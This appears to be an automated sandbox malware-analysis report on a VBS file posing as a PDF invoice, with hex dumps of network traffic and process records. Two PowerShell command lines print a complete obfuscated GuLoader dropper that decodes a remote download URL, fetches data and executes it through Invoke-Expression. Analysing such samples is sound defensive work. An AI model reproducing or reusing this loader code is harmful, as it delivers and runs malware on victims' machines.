                                      2024-10-01 05:47:22 UTC1319INData Raw: 35 08 21 75 a6 4b 62 d8 db 15 66 13 df d1 7f a1 8e fa 16 18 76 a5 69 a4 69 6a 76 11 00 3f 68 29 f4 bf 54 f0 a2 30 f2 b3 63 5c c3 2b 01 8b f7 ec dd 65 19 2c 43 60 d1 79 44 18 6b 78 06 8b f6 24 e5 5d b6 3b 0b 8e d1 fa ca 3c 2e 49 bf 79 fb 82 cf 47 fd 12 21 f0 4a ae 2f 7c bd 22 40 3e 08 87 45 aa 13 52 a0 20 85 c8 c6 98 80 cd ee 5e 3d a5 85 43 fe ca e0 07 55 78 bc ae 45 fe ce 9a 7f ba 1c 4a c7 f3 29 a4 02 c7 18 21 14 a7 50 56 3d d2 62 26 50 25 35 66 a1 50 87 67 6f 9e 56 ce 63 71 f1 08 1c b5 c9 c7 90 ca 15 ff 3e 41 2c ed 20 c2 02 fc d6 f1 eb 86 7c 10 36 5e 76 8d d1 b2 4b f0 ad e3 13 f4 ef 97 c8 d5 2f 75 69 c5 51 7f 78 7b 86 0b 06 64 11 91 5e 70 c7 39 e3 2d bd 96 14 1b 76 fb f7 79 79 f2 ce f6 ca 12 8c d4 3a aa 0d ba a8 ed a4 23 c3 56 69 ca 7c 0c 11 e2 5b 14 89
                                      Data Ascii: 5!uKbfviijv?h)T0c\+e,C`yDkx$];<.IyG!J/|"@>ER ^=CUxEJ)!PV=b&P%5fPgoVcq>A, |6^vK/uiQx{d^p9-vyy:#Vi|[
                                      2024-10-01 05:47:22 UTC1390INData Raw: 2f 28 cc 18 6c 50 18 9c 3b 80 b8 72 48 99 33 8d a7 52 58 d1 3e 2a a4 bf b3 40 a8 7b 93 d8 bc 7c a8 b8 ff f7 69 44 78 0d d3 2e 09 b4 ac b4 82 22 3a d1 1d 59 0e ba 76 1f 83 60 42 81 eb 5f d5 fc 2f 37 19 a6 e1 16 05 a1 7f 1a 26 2c 31 d8 b6 87 57 3b c6 af 47 01 2a 3f 48 0d 11 8d fc dd fb 18 ac ff c7 85 5f 8f e6 3d 7d d4 9b 68 e6 33 26 d5 02 4e fa 71 23 86 0f 09 57 40 9a cf 78 cd f8 b4 bc 91 f6 05 5b 35 6f fa 4b 07 f6 bc 0e e5 a5 91 59 21 76 84 60 ff 47 a3 cb 0b 82 59 0c f4 f2 d3 d7 6a 87 ee 89 3b 4c a7 bc 04 7f 23 b4 78 b5 00 e8 a6 23 f3 b9 83 fe 1e 0e 1a f9 ac c0 58 a0 24 34 15 29 0b c3 7a 2d ba b0 9e 6d d6 c4 63 d5 f9 49 43 0e 5f 16 06 9b e9 8f ee 5b a9 c0 44 0d 32 bc 2b f8 92 ba d2 c2 df 20 c3 9d d8 ac f9 4a ed 6d 9b a9 8d 67 80 b6 7c a1 d5 cd 26 d0 dc 29
                                      Data Ascii: /(lP;rH3RX>*@{|iDx.":Yv`B_/7&,1W;G*?H_=}h3&Nq#W@x[5oKY!v`GYj;L#x#X$4)z-mcIC_[D2+ Jmg|&)
                                      2024-10-01 05:47:22 UTC1390INData Raw: 32 78 2e 39 cd f6 9e ba c6 83 bc 56 30 b3 6f 7b c3 a7 bb d9 0f e1 3b 42 3a d2 3c 1c cd 1e fb 91 89 d2 0f 64 71 b5 49 85 30 58 27 05 96 33 1d f9 68 0c c7 29 a0 27 8b a9 1a b7 b4 a4 3c 85 e4 13 2f 0a c2 95 db 38 b9 6d 87 65 7a 03 2d bb 8a 1e 74 0f 50 3a be 9f e1 76 f7 2e cf 7e 0b 6d ca fe 03 49 b0 66 6d aa 2e 7d f7 6e 3e e8 fd 17 b1 97 12 98 7b 78 52 80 e8 f5 9c 36 59 7d 4d 75 96 12 0a ea 2d f4 12 0d 30 a7 16 c6 68 3a c1 73 2c b5 77 c0 0c dc 18 a3 59 10 46 67 24 9e ec b7 df fe 38 40 e1 d7 a2 05 ff fb 0d fb 95 03 ff ad f8 59 6c 1c cf b0 69 ff 38 9e 68 77 09 e3 58 d3 07 07 fb c0 c6 a3 14 71 5d 68 7e 01 b1 b9 2f 33 91 e3 63 14 88 72 b2 40 0c cc 72 51 8f b9 ee 60 94 3f e0 79 83 19 1c c3 4e 84 7d 66 d3 9f 91 4e a9 17 2b 8a bb 9e 71 d3 c6 6b c2 69 a5 e1 1c 43 df
                                      Data Ascii: 2x.9V0o{;B:<dqI0X'3h)'</8mez-tP:v.~mIfm.}n>{xR6Y}Mu-0h:s,wYFg$8@Yli8hwXq]h~/3cr@rQ`?yN}fN+qkiC
                                      2024-10-01 05:47:22 UTC1390INData Raw: 19 9b 9e 27 44 79 97 4d 67 09 3e 7d 79 a8 97 78 fa 47 77 63 a3 41 78 3c 0b da 66 ef 44 79 06 0e 5d 5e a3 d2 70 ec 36 56 00 0a 3e e5 b0 e9 48 95 33 e3 ff 97 1e 4c de c0 f5 a0 fe 47 9a 98 7f b1 68 f4 f5 2e 6a e8 54 91 7b 9a b8 94 78 c0 1f cf 7d 48 42 cb e4 8d 80 97 e2 8d ce a5 8c a4 84 31 a7 d0 6c 6b cf 31 82 88 b2 08 a4 a3 ac 9d 50 72 9e c1 78 12 2c db 89 47 3e 76 70 6d de 03 0a 74 12 d5 a1 a9 63 43 ed 78 a4 ad 17 07 fa 32 ee da 40 71 17 60 37 b7 0a e4 04 0c 6f 85 83 9c e3 9f 85 54 eb af de 75 e7 ef d9 c3 63 ab 63 1b b0 32 f0 41 e1 4d bf f9 55 38 42 fe c9 fa da 0d 87 ac 28 ee c4 91 d9 4d f9 11 f3 85 dd cd f8 98 25 32 f5 42 cf 47 dd a9 a8 7c 3d 8f 36 2b fb 83 94 82 e9 95 62 3c 92 62 b9 d9 96 a0 de bc 72 2a 0b 71 93 b8 d1 6a c5 71 78 d8 7d 8f 28 18 8a 73 23
                                      Data Ascii: 'DyMg>}yxGwcAx<fDy]^p6V>H3LGh.jT{x}HB1lk1Prx,G>vpmtcCx2@q`7oTucc2AMU8B(M%2BG|=6+b<br*qjqx}(s#
                                      2024-10-01 05:47:22 UTC1390INData Raw: 8d 44 c2 6d 3e 69 37 8b df f5 de 20 a5 2b c8 38 e2 a2 5d 81 e1 f9 8e fe 48 72 0b 32 87 19 29 6b 72 b6 f5 6b 55 65 d6 7f 29 02 dc 88 44 ec af 72 9e 81 be 48 3e 2b c0 53 ef 7c b1 0a 03 f0 40 08 68 94 98 29 0a 71 69 00 bb 38 1d 59 36 47 db 52 bd 0b f2 09 21 c2 15 b0 9d 4d af 2b 42 f4 fa 0a 07 6d f4 16 a0 cd b5 a1 30 02 9e b6 73 0f 0e 54 e1 32 7f 73 fe 8c fd 9f 2f a5 ad 5c 6a 5f 40 01 e4 96 8c 4e 3c fe 07 b5 c6 91 5b b0 1f 76 2a d6 95 8a 0d 0f 48 40 34 91 d5 a2 0a e9 23 00 a9 bc 43 7d 5a 35 b3 1b 36 82 b0 ae c5 91 79 ec 8e 5f d2 73 39 ad 67 e0 1c 42 65 e2 d2 ce e4 8f 4e dc af 1b 2b 34 3b ea 4d 59 be a7 c1 29 da dc 45 54 1f 24 95 3d 7e cb 98 9e 58 24 57 26 16 27 d0 c0 85 5d 14 ec fc ae 28 c1 b8 db 6f 6a df 09 19 90 fb 2c 32 52 df b5 c9 c7 42 78 60 3b c6 5a dc
                                      Data Ascii: Dm>i7 +8]Hr2)krkUe)DrH>+S|@h)qi8Y6GR!M+Bm0sT2s/\j_@N<[v*H@4#C}Z56y_s9gBeN+4;MY)ET$=~X$W&'](oj,2RBx`;Z
                                      2024-10-01 05:47:22 UTC1390INData Raw: 3e 2c fe d3 15 2e 88 54 2f 6e 78 c6 a7 9c cf 93 46 49 51 10 48 64 b7 70 56 21 e8 29 3e 90 2f 44 0d 5b cb 97 32 dc 4a b2 14 a6 03 13 63 4c b2 2d ec 78 eb cd 2e 09 6f 7d dc 86 b5 19 d3 8b 82 e9 c0 eb b0 b3 03 ea 78 c3 9b e0 87 8d 87 94 e2 c5 09 aa 8a e8 1e 2e 2c 35 0b 47 00 89 94 1d ec e3 ab dc 28 d3 dc 2b f9 bf 92 18 78 ac 2c ff 85 5f 01 67 1a a6 00 8c 45 2d 4f 35 4e 4d 8e 21 f5 5b 4d 7b 9b 01 94 21 e8 ff cb e7 dd 53 29 59 fc 4e 53 87 bc 12 36 e1 75 3e 4a 0a 45 c9 aa 2e 5b 09 c9 6f d5 f9 0b 91 12 92 4c e1 c6 5c b1 d8 fa fd dc d2 85 2d 86 2f a1 7c 6d 3c db 14 f7 ff 7d ff 40 51 80 21 3b 13 57 d0 d9 ac 1d 34 34 80 6f 6c 8c 4e 69 0a 89 20 26 7f b8 99 22 6e 75 39 71 16 7a d2 a9 20 10 e6 96 0b 4a 0d 46 2c 48 4a 19 1b 76 85 0f ad 0e 0b 3f 7c df 4b ed 5e 45 b3 fe
                                      Data Ascii: >,.T/nxFIQHdpV!)>/D[2JcL-x.o}x.,5G(+x,_gE-O5NM![M{!S)YNS6u>JE.[oL\-/|m<}@Q!;W44olNi &"nu9qz JF,HJv?|K^E
                                      2024-10-01 05:47:22 UTC1390INData Raw: 1f 0e b3 08 f2 62 fa 71 33 2a 8a ce 94 86 5a 52 78 37 ad 11 94 4f 22 15 1e 48 b7 4e 80 27 c3 7b 42 1c 91 38 58 1b c9 16 e6 27 be 81 fc 37 68 04 49 f5 dc 1c 42 a2 55 ae 39 57 c2 f2 f0 27 93 0b 3f 9c 68 7b 88 3f 87 a8 59 a1 de 02 2b e5 58 c1 4c 0a 4a 5c 65 b8 03 2d 82 90 1e 74 0f 50 3a be 9f e7 76 87 1d cf 7e bf cc f3 5a a3 9a 76 41 56 e0 6b 5b 28 8c 93 ff 38 a4 1c e3 e0 0e 7b fa 75 55 50 49 61 d2 a6 09 86 5a ae 05 a5 fd ae a7 23 1a 88 ae e5 b2 2d af 77 58 9b 1c df c0 ba 73 e5 48 2f f6 74 9b bb 27 cb 9a de fe 9e 9e 45 21 56 71 f0 10 09 0e 4e 77 32 0d 9b 54 de 0b 6a 6c 51 50 87 8b 7b 60 d9 60 9c df 73 bd 20 a4 69 7c 14 dc 59 68 7e 5d 28 b9 22 6b 97 e5 74 c4 48 81 c6 b2 23 5c 73 fe 98 9a 66 60 1f 98 34 24 83 19 0b be 6a 9c 95 b4 f5 68 6e a4 80 cd f0 fe 23 ca
                                      Data Ascii: bq3*ZRx7O"HN'{B8X'7hIBU9W'?h{?Y+XLJ\e-tP:v~ZvAVk[(8{uUPIaZ#-wXsH/t'E!VqNw2TjlQP{``s i|Yh~]("ktH#\sf`4$jhn#


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:01:46:36
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs"
                                      Imagebase:0x7ff78a430000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:01:46:39
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
                                      Imagebase:0x7ff760310000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:01:46:39
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff70f010000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:01:46:50
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali 